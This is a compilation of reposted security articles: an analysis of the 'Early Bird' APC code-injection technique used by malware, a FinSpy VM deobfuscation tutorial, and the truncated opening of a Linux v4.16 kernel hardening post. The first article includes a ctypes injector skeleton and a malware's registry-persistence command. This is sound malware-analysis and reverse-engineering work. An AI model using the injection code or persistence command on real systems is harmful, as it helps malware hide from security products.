Code injection is commonly used by malware to evade detection by injecting malicious code into a legitimate process. The legitimate process serves as camouflage: all that anti-malware tools see running is the legitimate process, which obscures the execution of the malicious code. We researched a code injection technique that appeared in malware samples at the Cyberbit malware research lab. It is a simple yet powerful technique. Its stealth allows execution of malicious code before the entry point of the main thread of a process, hence it can bypass security products’ hooks if they are not placed before the main thread resumes execution — the APC executes before any of that thread’s own code.

We saw this technique used by various malware, among them the “TurnedUp” backdoor written by APT33 (an Iranian hacker group), a variant of the notorious “Carberp” banking malware, and the DorkBot malware.

The malware code injection flow works as follows:

1. Create a suspended process (most likely a legitimate Windows process)
2. Allocate and write malicious code into that process
3. Queue an asynchronous procedure call (APC) to that process
4. Resume the main thread of the process to execute the APC

Hooks are code sections inserted by legitimate anti-malware products when a process starts running. They are placed on specific Windows API calls; their goal is to monitor API calls and their parameters to find malicious calls or call patterns. In this post, we explain how the APC execution flow works when a suspended process is resumed.
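The four-step flow above can be sketched with ctypes against the documented Win32 APIs. This is an illustration, not a working injector: the structures are minimal, there is no error handling, the host process and payload are placeholder assumptions, and the call is only attempted on Windows.

```python
# Sketch of the 'Early Bird' flow, assuming a placeholder host and payload.
import ctypes
import sys

CREATE_SUSPENDED = 0x00000004
MEM_COMMIT_RESERVE = 0x3000      # MEM_COMMIT | MEM_RESERVE
PAGE_EXECUTE_READWRITE = 0x40

# The technique's four steps, in the order described in the text.
EARLY_BIRD_STEPS = [
    "CreateProcessA(CREATE_SUSPENDED)",
    "VirtualAllocEx + WriteProcessMemory",
    "QueueUserAPC",
    "ResumeThread",
]

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", ctypes.c_void_p), ("hThread", ctypes.c_void_p),
                ("dwProcessId", ctypes.c_uint32), ("dwThreadId", ctypes.c_uint32)]

def early_bird_inject(host: bytes, shellcode: bytes) -> None:
    """Hypothetical injector skeleton; meaningful only on Windows."""
    k32 = ctypes.windll.kernel32
    si = ctypes.create_string_buffer(104)        # zeroed STARTUPINFOA (sketch)
    pi = PROCESS_INFORMATION()
    # 1. Create the host process (e.g. svchost.exe) in a suspended state.
    k32.CreateProcessA(host, None, None, None, False, CREATE_SUSPENDED,
                       None, None, si, ctypes.byref(pi))
    # 2. Allocate executable memory in the host and write the payload there.
    remote = k32.VirtualAllocEx(pi.hProcess, None, len(shellcode),
                                MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    k32.WriteProcessMemory(pi.hProcess, remote, shellcode, len(shellcode), None)
    # 3. Queue an APC at the payload on the still-suspended main thread.
    k32.QueueUserAPC(remote, pi.hThread, 0)
    # 4. Resume the thread; the APC fires before the process entry point runs.
    k32.ResumeThread(pi.hThread)

if __name__ == "__main__" and sys.platform == "win32":
    early_bird_inject(b"C:\\Windows\\System32\\notepad.exe", b"\xcc")  # int3 stub
```

The malware analyzed below uses the native NtQueueApcThread/NtResumeThread pair rather than these documented wrappers, but the flow is the same.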
This code injection technique can be drawn like this:

Synopsis of the Technical Analysis of the Early Bird Code Injection Technique

While analyzing samples at our lab, we came across a very interesting malware sample (SHA256: 9173b5a1c2ca928dfa821fb1502470c7f13b66ac2a1638361fda141b4547b792). It starts with the .net sample deobfuscating itself, then performing process hollowing and filling the hollowed process with a native Windows image. The native Windows image injects into the explorer.exe process. The payload inside explorer.exe creates a suspended process – svchost.exe – and injects into it. The sample consists of three different injection methods (we consider process hollowing to be an injection technique as well). The SHA256 of the payload inside svchost.exe is c54b92a86c9051172954fd64573dd1b9a5e950d3ebc581d02c8213c01bd6bf14. As of 20 March 2018, this payload was detected by only 29 out of 62 anti-malware vendors. The original sample, which dates back to 2014, was detected by 47 out of 62 vendors.

While the process hollowing and the second injection into explorer.exe are trivial, the third technique caught our attention. Let’s have a look at the debugger before the injection into svchost.exe happens.

Figure 1 – A suspended svchost.exe process is created

At this point the malware creates a suspended svchost.exe process. Common legitimate Windows processes are among malware's favorite choices; svchost.exe is a Windows process designated to host services. After creating the process, the malware allocates memory in it and writes code into the allocated memory region. To execute this code, it calls NtQueueApcThread to queue an asynchronous procedure call (APC) on the main thread of svchost.exe. Next, it calls NtResumeThread to decrease the suspend count of that thread to zero; consequently, the main thread of svchost.exe will resume execution — and if this thread is in an alertable state, the APC will execute first.
Figure 2 – Queuing an APC to svchost.exe's main thread and resuming the thread

When queuing an APC to a thread, the thread must be in an alertable state in order for that APC to execute. According to the Microsoft documentation: “When a user-mode APC is queued, the thread to which it is queued is not directed to call the APC function unless it is in an alertable state. A thread enters an alertable state when it calls the SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx, or WaitForSingleObjectEx function.”

But the thread has not even started its execution, since the process was created in a suspended state. How does the malware “know” that this thread will be alertable at some point? Does this method work exclusively on svchost.exe, or will it always work when a process is created in a suspended state? To check this out, we patched the malware so it would inject into other processes of our choice, and witnessed it working with various other processes as well.

We went further, to research what goes on when a main thread is resumed after its process is created in a suspended state. By putting a breakpoint on the call to NtQueueApcThread, we can see the APC address in svchost.exe is 0x00062f5b. We attached a debugger to this process and put a breakpoint on that address. Here is what the svchost.exe process looks like at 0x00062f5b (the start address of the APC).

Figure 3 – The APC starts execution at svchost.exe

Let’s look at the call stack (figure 4) after resuming the thread. Our breakpoint on 0x00062f5b was hit as expected:

Figure 4 – The call stack of svchost.exe

We first have to note that every user-mode thread begins its execution at the LdrInitializeThunk function. When we look at the bottom of the call stack we see that LdrpInitialize, which is called from LdrInitializeThunk (figure 5), was called. We trace into LdrpInitialize and see that it jumps to the function _LdrpInitialize (figure 6).
Inside _LdrpInitialize, we see a call to NtTestAlert (figure 7) which is a function responsible for checking if there is an APC queued to the current thread – if there is one – it notifies the kernel. Before returning to user-mode, the kernel prepares the user-mode thread to jump to KiUserApcDispatcher which will execute the malicious code in our case. Figure 5 – 0x76e539c1 led to an address after the call from LdrpInitialize Figure 6 – Inside LdrpInitialize there is a jump to _LdrpInitialize Figure 7 – Inside _LdrpInitialize there is a call to NtTestAlert We can see evidence that this APC was executed by KiUserApcDispatcher (figure 8), by looking at the call stack again, and see that the return address of 0x00062f5b is 0x76e36f9d – right after the call from KiUserApcDispatcher. Figure 8 – KiUserApcDispatcher executed the APC To sum it up, the execution flow that led to the execution of the APC is: LdrInitializeThunk → LdrpInitialize → _LdrpInitialize → NtTestAlert → KiUserApcDispatcher An important note about this injection method is that it loads the malicious code in a very early stage of thread initialization, before many security products place their hooks – which allows the malware to perform its malicious actions without being detected. In the wild This technique was seen in other samples in our lab (SHA 256): 165c6f0b229ef3c752bb727b4ea99d2b1f8074bbb45125fbd7d887cba44e5fa8 368b09f790860e6bb475b684258ef215193e6f4e91326d73fd3ab3f240aedddb a82c9123c12957ef853f22cbdf6656194956620d486a4b37f5d2767f8d33dc4d d17dce48fbe81eddf296466c7c5bb9e22c39183ee9828c1777015c1652919c30 5e4a563df904b1981d610e772effcb005a2fd9f40e569b65314cef37ba0cf0c7 The last two samples in this list are the most recent, dated from 31 October 2017. These samples are the “TurnedUp” backdoor written by the Iranian hackers group APT33. 
Figure 9 is a screenshot from the last sample, which shows the use of this technique in an injection into rundll32.exe – a legitimate Windows process used to run exported functions from DLL files.

Figure 9 – A suspended rundll32.exe process is created, followed by injection using QueueUserApc

In this sample, the APC is used to maintain persistence on the system. In figure 10 you can see where the APC starts (0x90000) inside rundll32.exe. Going just a bit further reveals that the malware will write a key to the Windows registry to maintain persistence, by executing ShellExecuteA with cmd and a specific command (figure 11). The cmd command is:

/c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d "C:\Users\ADMINI~1\AppData\Local\Temp\StikyNote.exe"

In this case, if a hook on ShellExecuteA was placed after the APC was called, this ‘Early Bird’ call and its parameters would sneak by before the hook, hence failing to detect an important malware behavior.

Figure 10 – APC starts execution at rundll32.exe

Figure 11 – The call to ShellExecuteA

The third sample in the list (a82c9123c12957ef853f22cbdf6656194956620d486a4b37f5d2767f8d33dc4d) dates back to 2011 and is variant D of the notorious Carberp malware.

Cyberbit provides an Endpoint Detection and Response (EDR) solution which successfully detects the ‘Early Bird’ injection technique.

Analysis of ‘Early Bird’ injection automatically created by Cyberbit EDR

Hod Gavriel is a malware analyst at Cyberbit. Boris Erbesfeld is a principal software engineer at Cyberbit.

Sursa: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
-
A Walk-Through Tutorial, with Code, on Statically Unpacking the FinSpy VM: Part One, x86 Deobfuscation January 23, 2018 Rolf Rolles 1. Introduction Normally when I publish about breaking virtual machine software protections, I do so to present new techniques. Past examples have included: Writing an IDA processor module to unpack a VM Logging VM execution with DLL injection Compiler-based techniques to unpack commercial-grade VMs Abstract interpretation-based techniques to deobfuscate control flow Automated generation of peephole superdeobfuscators Program synthesis-based deobfuscation of metamorphic behavior in VM handlers Today's document has a different focus. I am not going to be showcasing any particularly new techniques. I will, instead, be providing a step-by-step walk-through of the process I used to analyze the FinSpy VM, including my thoughts along the way, the procedures and source code I used, and summaries of the notes I took. The interested reader is encouraged to obtain the sample and walk through the analysis process for themselves. I have three motives in publishing this document: I think it's in the best interest of the security defense community if every malware analyst is able to unpack the FinSpy malware VM whenever they encounter it (for obvious reasons). Reverse engineering is suffering from a drought of hands-on tutorial material in modern times. I was fortunate to begin reverse engineering when such tutorials were common, and they were invaluable in helping me learn the craft. Slides are fine for large analyses, but for smaller ones, let's bring back tutorials for the sake of those that have followed us. Publications on obfuscation, especially virtualization obfuscation, have become extremely abstruse particularly in the past five years. Many of these publications are largely inaccessible to those not well-versed in master's degree-level program analysis (or above). 
I want to demonstrate that easier techniques can still produce surprisingly fast and useful results for some contemporary obfuscation techniques. (If you want to learn more about program analysis-based approaches to deobfuscation, there is currently a public offering of my SMT-based program analysis training class, which has over 200 slides on modern deobfuscation with working, well-documented code.) Update: the rest of this document, the second and third parts, are now available online at the links just given. 2. Initial Steps The first thing I did upon learning that a new FinSpy sample with VM was publicly available was, of course, to obtain the sample. VirusTotal gave the SHA256 hash; and I obtained the corresponding sample from Hybrid-Analysis. The next step was to load the sample into IDA. The navigation bar immediately tipped me off that the binary was obfuscated: The first half of the .text section is mostly colored grey and red, indicating data and non-function code respectively. The second half of the .text section is grey in the navigation bar, indicating data turned into arrays. A normal binary would have a .text section that was mostly blue, indicating code within functions. 3. Analysis of WinMain: Suspicions of VM-Based Obfuscation IDA's auto-analysis feature identified that the binary was compiled by the Microsoft Visual C compiler. I began by identifying the WinMain function. Normally IDA would do this on my behalf, but the code at that location is obfuscated, so IDA did not name it or turn it into a function. I located WinMain by examining the ___tmainCRTStartup function from the Visual C Run-Time and finding where it called into user-written code. The first few instructions resembled a normal function prologue; from there, the obfuscation immediately began. 
.text:00406154 mov edi, edi                      ; Normal prologue
.text:00406156 push ebp                          ; Normal prologue
.text:00406157 mov ebp, esp                      ; Normal prologue
.text:00406159 sub esp, 0C94h                    ; Normal prologue
.text:0040615F push ebx                          ; Save registers #1
.text:00406160 push esi                          ; Save registers #1
.text:00406161 push edi                          ; Save registers #1
.text:00406162 push edi                          ; Save registers #2
.text:00406163 push edx                          ; Save registers #2
.text:00406164 mov edx, offset byte_415E41       ; Obfuscation - #1
.text:00406169 and edi, 0C946B9C3h               ; Obfuscation - #2
.text:0040616F sub edi, [edx+184h]               ; Obfuscation - #3
.text:00406175 imul edi, esp, 721D31h            ; Obfuscation - #4
.text:0040617B stc                               ; Obfuscation
.text:0040617C sub edi, [edx+0EEh]               ; Obfuscation - #5
.text:00406182 shl edi, cl                       ; Obfuscation
.text:00406184 sub edi, [edx+39h]                ; Obfuscation - #6
.text:0040618A shl edi, cl                       ; Obfuscation
.text:0040618C imul edi, ebp                     ; Obfuscation
.text:0040618F mov edi, edi                      ; Obfuscation
.text:00406191 stc                               ; Obfuscation
.text:00406192 sub edi, 0A14686D0h               ; Obfuscation
; ... obfuscation continues ...
.text:004065A2 pop edx                           ; Restore registers
.text:004065A3 pop edi                           ; Restore registers

The obfuscation in the sequence above continues for several hundred instructions, nearly all of them consisting of random-looking modifications to the EDI register. I wanted to know A) whether the computations upon EDI were entirely immaterial junk instructions, or whether a real value was being produced by this sequence, and B) whether the memory references in the lines labeled #1, #3, #5, and #6 were meaningful. As for the first question, note that the values of the registers upon entering this sequence are unknown. We are, after all, in WinMain(), which uses the __cdecl calling convention, meaning that the caller did not pass arguments in registers. Therefore, the value computed on line #2 is unpredictable and can potentially change across different executions.
Also, the value computed on line #4 is pure gibberish -- the value of the stack pointer will change across runs (and the modification to EDI overwrites the values computed on lines #1-#3). As for the second question, I skimmed the obfuscated listing and noticed that there were no writes to memory, only reads, all intertwined with gibberish instructions like the ones just described. Finally, the original value of edi is popped off the stack at the location near the end labeled "restore registers". So I was fairly confident that I was looking at a sequence of instructions meant to do nothing, producing no meaningful change to the state of the program. Following that was a short sequence:

.text:004065A4 push 5A403Dh                      ; Obfuscation
.text:004065A9 push ecx                          ; Obfuscation
.text:004065AA sub ecx, ecx                      ; Obfuscation
.text:004065AC pop ecx                           ; Obfuscation
.text:004065AD jz loc_401950                     ; Transfer control elsewhere
.text:004065AD ; ---------------------------------------------------------------------------
.text:004065B3 db 5 dup(0CCh)
.text:004065B8 ; ---------------------------------------------------------------------------
.text:004065B8 mov edi, edi
.text:004065BA push ebp
.text:004065BB mov ebp, esp
.text:004065BD sub esp, 18h
; ... followed by similar obfuscation to what we saw above ...

By inspection, this sequence just pushes the value 5A403Dh onto the stack, and transfers control to loc_401950. (The "sub ecx, ecx" instruction above sets the zero flag to 1, therefore the JZ instruction will always branch.) Next we see the directive "db 5 dup(0CCh)" followed by "mov edi, edi". Reverse engineers will recognize these sequences as the Microsoft Visual C compiler's implementation of hot-patching support. The details of hot-patching are less important than the observation that I expected that the original pre-obfuscated binary contained a function that began at the address of the first sequence, and ended before the "db 5 dup(0CCh)" sequence. I.e.
I expect that the obfuscator disassembled all of the code within this function, replaced it with gibberish instructions, placed a branch at the end to some other location, and then did the same thing with the next function. This is a good sign that we're dealing with a virtualization-based obfuscator: namely, it looks like the binary was compiled with an ordinary compiler, then passed to a component that overwrote the original instructions (rather than merely encrypting them in-place, as would normal packers). 4. Learning More About the VM Entrypoint and VM Pre-Entry Recall again the second sequence of assembly code from the previous sequence: .text:004065A4 push 5A403Dh ; Obfuscation - #1 .text:004065A9 push ecx ; Obfuscation .text:004065AA sub ecx, ecx ; Obfuscation .text:004065AC pop ecx ; Obfuscation .text:004065AD jz loc_401950 ; Transfer control elsewhere Since -- by supposition -- all of the code from this function was replaced with gibberish, there wasn't much to meaningfully analyze. My only real option was to examine the code at the location loc_401950, the target of the JZ instruction on the last line. The first thing I noticed at this location, loc_401950, was that there were 125 incoming references, nearly all of them of the form "jz loc_401950", with some of the form "jmp loc_401950". Having analyzed a number of VM-based obfuscators in my day, this location fits the pattern of being the part of the VM known as the "entrypoint" -- the part where the virtual CPU begins to execute. Usually this location will save the registers and flags onto the stack, before performing any necessary setup, and finally beginning to execute VM instructions. VM entrypoints usually require a pointer or other identifier to the bytecode that will be executed by the VM; maybe that's the value from the instruction labeled #1 in the sequence above? 
Let's check another incoming reference to that location to verify:

.text:00408AB8 push 5A7440h                      ; #2
.text:00408ABD push eax
.text:00408ABE sub eax, eax
.text:00408AC0 pop eax
.text:00408AC1 jz loc_401950

The other location leading to the entrypoint is functionally identical, apart from pushing a different value onto the stack. This value is not a pointer; it does not correspond to an address within the executable's memory image. Nevertheless, we expect that this value is somehow responsible for telling the VM entrypoint where the bytecode is located.

5. Analyzing the VM Entrypoint Code

So far we have determined that loc_401950 is the VM entrypoint, targeted by 125 branching locations within the binary, which each push a different non-pointer DWORD before branching. Let's start analyzing that code:

.text:00401950 loc_401950:
.text:00401950 0F 82 D1 02 00 00                 jb loc_401C27
.text:00401956 0F 83 CB 02 00 00                 jnb loc_401C27

Immediately we see an obvious and well-known form of obfuscation. The first line jumps to loc_401C27 if the "below" conditional is true, and the second line jumps to loc_401C27 if the "not below" conditional is true. I.e., execution will reach loc_401C27 if either "below" or "not below" is true in the current EFLAGS context. I.e., these two instructions will transfer control to loc_401C27 no matter what is in EFLAGS -- and in particular, we might as well replace these two instructions with "jmp loc_401C27", as the effect would be identical. Continuing to analyze at loc_401C27, we see another instance of the same basic idea:

.text:00401C27 loc_401C27:
.text:00401C27 77 CD                             ja short loc_401BF6
.text:00401C29 76 CB                             jbe short loc_401BF6

Here we have an unconditional branch to loc_401BF6, split across two instructions -- a "jump if above", and "jump if below or equals", where "above" and "below or equals" are logically opposite and mutually exclusive conditions.
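These "mutually exclusive" pairs hinge on a convenient property of the x86 encoding: opposite conditions differ only in the lowest bit of the condition code. A quick standalone check in Python (opcode values per the Jcc encodings; the helper name is mine):

```python
# Short-form opcodes for a few conditional branches (x86 Jcc rel8 encodings).
SHORT_JCC = {
    "jb": 0x72, "jnb": 0x73, "jz": 0x74, "jnz": 0x75, "jbe": 0x76, "ja": 0x77,
}

def opposite_conditions(op1: int, op2: int) -> bool:
    """True if two Jcc condition bytes encode mutually exclusive conditions."""
    return (op1 ^ op2) == 0x01

# The ja/jbe pair from loc_401C27 above:
assert opposite_conditions(SHORT_JCC["ja"], SHORT_JCC["jbe"])
assert opposite_conditions(SHORT_JCC["jb"], SHORT_JCC["jnb"])
# The long forms (0F 80..0F 8F) obey the same rule on the second opcode byte:
assert opposite_conditions(0x82, 0x83)   # jb rel32 vs jnb rel32
print("all pairs check out")
```

This single-bit relationship is what makes the obfuscation so mechanically detectable later on.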
After this, at location loc_401BF6, there is a legitimate-looking instruction (push eax), followed by another conditional jump pair to loc_401D5C. At that location, there is another legitimate-looking instruction (push ecx), followed by a conditional jump pair to loc_4019D2. At that location, there is another legitimate-looking instruction (push edx), followed by another conditional jump pair. It quickly became obvious that every legitimate instruction was interspersed between one or two conditional jump pairs -- there are hundreds or thousands of these pairs throughout the binary. Though an extremely old and not particularly sophisticated form of obfuscation, it is nevertheless annoying and degrades the utility of one's disassembler. As I discussed in a previous entry on IDA processor module extensions, IDA does not automatically recognize that two opposite conditional branches to the same location are an unconditional branch to that location. As a result, IDA thinks that the address following the second conditional branch must necessarily contain code. Obfuscation authors exploit this by putting junk bytes after the second conditional branch, which then causes the disassembler to generate garbage instructions, which may overlap and occlude legitimate instructions following the branch due to the variable-length encoding scheme for X86. (Note that IDA is not to blame for this conundrum -- ultimately these problems are undecidable under ordinary Von Neumann-based models of program execution.) The result is that many of the legitimate instructions get lost in the dreck generated by this process, and that, in order to follow the code as usual in manual static analysis, one would spend a lot of time manually undefining the gibberish instructions and re-defining the legitimate ones. 6. 
Deobfuscating the Conditional Branch Obfuscation: Theory and Practice Manually undefining and redefining instructions as just described, however, would be a waste of time, so let's not do that. Speaking of IDA processor modules, once it became clear that this pattern repeated between every legitimate non-control-flow instruction, I got the idea to write an IDA processor module extension to remove the obfuscation automatically. IDA processor module extensions give us the ability to have a function of ours called every time the disassembler encounters an instruction. If we could recognize that the instruction we were disassembling was a conditional branch, and determine that the following instruction contains its opposite conditional branch to the same target as the first, we could replace the first one with an unconditional branch and NOP out the second branch instruction. Thus, the first task is to come up with a way to recognize instances of this obfuscation. It seemed like the easiest way would be to do this with byte pattern-recognition. In my callback function that executes before an instruction is disassembled, I can inspect the raw bytes to determine whether I'm dealing with a conditional branch, and if so, what the condition is and the branch target. Then I can apply the same logic to determine whether the following instruction is a conditional branch and determine its condition and target. If the conditions are opposite and the branch targets are the same, we've found an instance of the obfuscation and can neutralize it. In practice, this is even easier than it sounds! Recall the first example from above, reproduced here for ease of reading: .text:00401950 0F 82 D1 02 00 00 jb loc_401C27 .text:00401956 0F 83 CB 02 00 00 jnb loc_401C27 Each of these two instructions is six bytes long. 
They both begin with the byte 0F (the x86 two-byte escape opcode stem), are then followed by a byte in the range of 80 to 8F, and are then followed by a DWORD encoding the displacement from the end of the instructions to the branch targets. As a fortuitous quirk of x86 instruction encodings, opposite conditional branches are encoded with adjacent bytes. I.e. 82 represents the long form of JB, and 83 represents the long form of JNB. Two long branches have opposite condition codes if and only if their second opcode byte differs from one another in the lowest bit (i.e. 0x82 ^ 0x83 == 0x01). And note also that the DWORDs following the second opcode byte differ by exactly 6 -- the length of a long conditional branch instruction. That's all we need to know for the long conditional branches. There is also a short form for conditionals, shown in the second example above and reproduced here for ease of reading: .text:00401C27 77 CD ja short loc_401BF6 .text:00401C29 76 CB jbe short loc_401BF6 Virtually identical comments apply to these sequences. The first bytes of both instructions are in the range of 0x70 to 0x7F, opposite conditions have differing lowest bits, and the second bytes differ from one another by exactly 2 -- the length of a short conditional branch instruction. 7. Deobfuscating the Conditional Branch Obfuscation: Implementation I started by copying and pasting my code from the last time I did something like this. I first deleted all the code that was specific to the last protection I broke with an IDA processor module extension. Since I've switched to IDA 7.0 in the meantime, and since IDA 7.0 made breaking changes vis-a-vis prior APIs, I had to make a few modifications -- namely, renaming the custom analysis function from deobX86Hook::custom_ana(self) to deobX86Hook::ev_ana_insn(self, insn), and replacing every reference to idaapi.cmd.ea with insn.ea. 
Also, my previous example would only run if the binary's MD5 matched a particular sum, so I copied and pasted the sum of my sample out of IDA's database preamble over the previous MD5. From there I had to change the logic in custom_ana. The result was even simpler than my last processor module extension. Here is the logic for recognizing and deobfuscating the short form of the conditional branch obfuscation:

b1 = idaapi.get_byte(insn.ea)
if b1 >= 0x70 and b1 <= 0x7F:
    d1 = idaapi.get_byte(insn.ea+1)
    b2 = idaapi.get_byte(insn.ea+2)
    d2 = idaapi.get_byte(insn.ea+3)
    if b2 == b1 ^ 0x01 and d1-2 == d2:
        # Replace first byte of first conditional with 0xEB, the opcode for "JMP rel8"
        idaapi.put_byte(insn.ea, 0xEB)
        # Replace the following instruction with two 0x90 NOP instructions
        idaapi.put_word(insn.ea+2, 0x9090)

Deobfuscating the long form is nearly identical; see the code for details.

8. Admiring My Handiwork, Cleaning up the Database a Bit

Now I copied the processor module extension to %IDA%\plugins and re-loaded the sample. It had worked! The VM entrypoint had been replaced with:

.text:00401950 loc_401950:
.text:00401950 jmp loc_401C27

Though the navigation bar was still largely red and ugly, I immediately noticed a large function in the middle of the text section:

Looking at it in graph mode, we can see that it's kind of ugly and not entirely as nice as analyzing unobfuscated X86, but considering how trivial it was to get here, I'll take it over the obfuscated version any day. The red nodes denote errant instructions physically located above the valid ones in the white nodes. IDA's graphing algorithm includes any code within the physically contiguous region of a function's chunks in the graph display, regardless of whether they have incoming code cross-references, likely to make displays of exception handlers nicer. It would be easy enough to remove these and strip the JMP instructions if you wanted to write a plugin to do so.
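Outside of IDA, the same short-form transformation can be exercised directly against a raw byte buffer. A minimal standalone sketch (the opcode range, XOR test, displacement check, and 0xEB/0x90 patch bytes follow the logic above; the buffer and function name are illustrative):

```python
def deobfuscate_short_jcc_pairs(code: bytearray) -> int:
    """Rewrite 'jcc X / j!cc X' pairs into 'jmp X / nop nop'. Returns pair count."""
    patched = 0
    for i in range(len(code) - 3):
        b1, d1, b2, d2 = code[i], code[i+1], code[i+2], code[i+3]
        # Short Jcc opcodes live in 0x70..0x7F; opposite conditions differ in
        # the lowest bit, and the second displacement is 2 less because the
        # second branch starts 2 bytes later but targets the same address.
        if 0x70 <= b1 <= 0x7F and b2 == b1 ^ 0x01 and (d1 - 2) & 0xFF == d2:
            code[i] = 0xEB               # JMP rel8
            code[i+2:i+4] = b"\x90\x90"  # NOP out the second branch
            patched += 1
    return patched

# The pair from loc_401C27: 'ja short X / jbe short X' (77 CD / 76 CB).
buf = bytearray(b"\x77\xCD\x76\xCB")
n = deobfuscate_short_jcc_pairs(buf)
print(n, buf.hex())  # -> 1 ebcd9090
```

Unlike the processor-module version, this naive scan has no notion of instruction boundaries, so on real code it could mispatch bytes that merely look like a Jcc pair; the IDA callback avoids that by only firing at genuine instruction starts.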
Next I was curious about what the grey areas in the .text section navigation bar held. (Those areas denote defined data items, mixed in with the obfuscated code in the .text section.) I figured that the data held there was most likely related to the obfuscator. I spent a minute looking at the grey regions and found this immediately after the defined function:

.text:00402AE0 dd offset loc_402CF2
.text:00402AE4 dd offset loc_402FBE
; ... 30 similar lines deleted ...
.text:00402B60 dd offset loc_4042DC
.text:00402B64 dd offset loc_40434D

34 offsets, each of which points to code. Those are probably the VM instruction handlers. For good measure, let's turn those into functions with an IDAPython one-liner:

for pFuncEa in xrange(0x00402AE0, 0x00402B68, 4):
    idaapi.add_func(idaapi.get_long(pFuncEa))

Now a large, contiguous chunk of the navigation bar for the .text section is blue. And at this point I realized I had forgotten to create a function at the original dispatcher location, so I did that manually, and here was the resulting navigation bar:

Hex-Rays doesn't do a very good job with any of the functions we just defined, since they were originally written in assembly language and use instructions and constructs not ordinarily produced by compilers. I don't blame Hex-Rays for that, and I hope they continue to optimize for standard compiler-based use cases and not weird ones like this.

Lastly, I held PageDown, scrolling through the text section to see what was left. The majority of it was VM entrypoints like those we saw in section 3. There were a few functions that appeared to have been produced by a compiler. So now we have assessed what's in the text section -- a VM with 34 handlers, 125+ virtualized functions, and a handful of unvirtualized ones. Next time we'll take a look at the VM.

9. Preview of Parts 2 and 3, and Beyond

After this I spent a few hours analyzing the VM entrypoint and VM instruction handlers.
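As an aside, the handler-table walk at 00402AE0 boils down to unpacking little-endian DWORDs. Recreated over a raw byte string it looks like this (the bytes below are a hypothetical stand-in for the first three of the 34 table entries):

```python
import struct

# Hypothetical stand-in for the start of the handler table at .text:00402AE0;
# each entry is a little-endian DWORD holding a handler's address.
table_bytes = struct.pack("<3I", 0x402CF2, 0x402FBE, 0x4042DC)

def read_handler_table(raw: bytes) -> list:
    """Unpack a table of little-endian 32-bit function pointers."""
    return [addr for (addr,) in struct.iter_unpack("<I", raw)]

handlers = read_handler_table(table_bytes)
print([hex(h) for h in handlers])  # -> ['0x402cf2', '0x402fbe', '0x4042dc']
```

In the real database one would iterate the full 0x00402AE0–0x00402B68 range, exactly as the IDAPython one-liner does with idaapi.get_long.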
Next, through static analysis I obtained the bytecode for the VM program contained within this sample. I then wrote a disassembler for the VM. That's part two.

From there, by staring at the disassembled VM bytecode I was able to write a simple pattern-based deobfuscator. After that I re-generated the X86 machine code, which was not extremely difficult, but it was more laborious than I had originally anticipated. That's part three.

After that, I re-inserted the X86 machine code into the original binary and analyzed it. It turned out to be a fairly sophisticated dropper for one of two second-stage binaries. It was fairly heavy on system internals and had a few tricks that aren't widely documented, so I may publish one or more of those as separate entries, and/or I may publish an analysis of the entire dropper.

Finally, I analyzed -- or rather, still am analyzing -- the second-stage binaries. They may or may not prove worthy of publication.

Sursa: http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation
-
April 12, 2018

security things in Linux v4.16

Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 5:04 pm

Previously: v4.15

Linux kernel v4.16 was released last week. I really should write these posts in advance, otherwise I get distracted by the merge window. Regardless, here are some of the security things I think are interesting:

KPTI on arm64

Will Deacon, Catalin Marinas, and several other folks brought Kernel Page Table Isolation (via CONFIG_UNMAP_KERNEL_AT_EL0) to arm64. While most ARMv8+ CPUs were not vulnerable to the primary Meltdown flaw, the Cortex-A75 does need KPTI to be safe from memory content leaks. It's worth noting, though, that KPTI does protect other ARMv8+ CPU models from having privileged register contents exposed. So, whatever your threat model, it's very nice to have this clean isolation between kernel and userspace page tables for all ARMv8+ CPUs.

hardened usercopy whitelisting

While whole-object bounds checking was implemented in CONFIG_HARDENED_USERCOPY already, David Windsor and I finished another part of the porting work of grsecurity's PAX_USERCOPY protection: usercopy whitelisting. This further tightens the scope of slab allocations that can be copied to/from userspace. Now, instead of allowing all objects in slab memory to be copied, only the whitelisted areas (where a subsystem has specifically marked the memory region allowed) can be copied. For example, only the auxv array out of the larger mm_struct.

As mentioned in the first commit from the series, this reduces the scope of slab memory that could be copied out of the kernel in the face of a bug to under 15%. As can be seen, one area of work remaining is the kmalloc regions. Those are regularly used for copying things in and out of userspace, but they're also used for small simple allocations that aren't meant to be exposed to userspace.
Working to separate these kmalloc users needs some careful auditing:

    Total Slab Memory:       48074720
    Usercopyable Memory:      6367532   13.2%
        task_struct               0.2%      4480/1630720
        RAW                       0.3%       300/96000
        RAWv6                     2.1%      1408/64768
        ext4_inode_cache          3.0%    269760/8740224
        dentry                   11.1%    585984/5273856
        mm_struct                29.1%     54912/188448
        kmalloc-8               100.0%     24576/24576
        kmalloc-16              100.0%     28672/28672
        kmalloc-32              100.0%     81920/81920
        kmalloc-192             100.0%     96768/96768
        kmalloc-128             100.0%    143360/143360
        names_cache             100.0%    163840/163840
        kmalloc-64              100.0%    167936/167936
        kmalloc-256             100.0%    339968/339968
        kmalloc-512             100.0%    350720/350720
        kmalloc-96              100.0%    455616/455616
        kmalloc-8192            100.0%    655360/655360
        kmalloc-1024            100.0%    812032/812032
        kmalloc-4096            100.0%    819200/819200
        kmalloc-2048            100.0%   1310720/1310720

This series took quite a while to land (you can see David's original patch date as back in June of last year). Partly this was due to having to spend a lot of time researching the code paths so that each whitelist could be explained for commit logs, partly due to making various adjustments from maintainer feedback, and partly due to the short merge window in v4.15 (when it was originally proposed for merging) combined with some last-minute glitches that made Linus nervous. After baking in linux-next for almost two full development cycles, it finally landed. (Though be sure to disable CONFIG_HARDENED_USERCOPY_FALLBACK to gain enforcement of the whitelists — by default it only warns and falls back to the full-object checking.)

automatic stack-protector

While the stack-protector features of the kernel have existed for quite some time, it has never been enabled by default. This was mainly due to needing to evaluate compiler support for the feature, and Kconfig didn't have a way to check the compiler features before offering CONFIG_* options. As a defense technology, the stack protector is pretty mature.
